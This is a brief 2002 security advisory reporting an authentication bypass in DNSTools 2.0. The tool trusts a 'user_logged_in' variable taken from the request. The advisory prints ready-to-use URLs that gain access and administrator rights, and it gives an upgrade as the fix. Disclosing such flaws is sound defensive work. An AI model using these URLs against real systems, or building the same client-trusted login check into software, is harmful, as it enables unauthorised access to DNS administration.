30th Apr 2002 [SBWID-5314]
COMMAND
	dnstool web authentification bypass
SYSTEMS AFFECTED
	Version 2.0
PROBLEM
	As reported by ppp-design [http://www.ppp-design.de/advisories.php] :
	The  following   URL   would   let   you   access   the   tool   without
	authentificatoion  because  the  mecanism  is  simply   based   on   var
	user_logged_in being set ...
	
	http://<web site>/dnstools.php?section=hosts&user_logged_in=true
	http://<web site>/dnstools.php?section=security&user_logged_in=true
	&user_dnstools_administrator=YES
	
SOLUTION
	Upgrade to version 2.0 beta 5.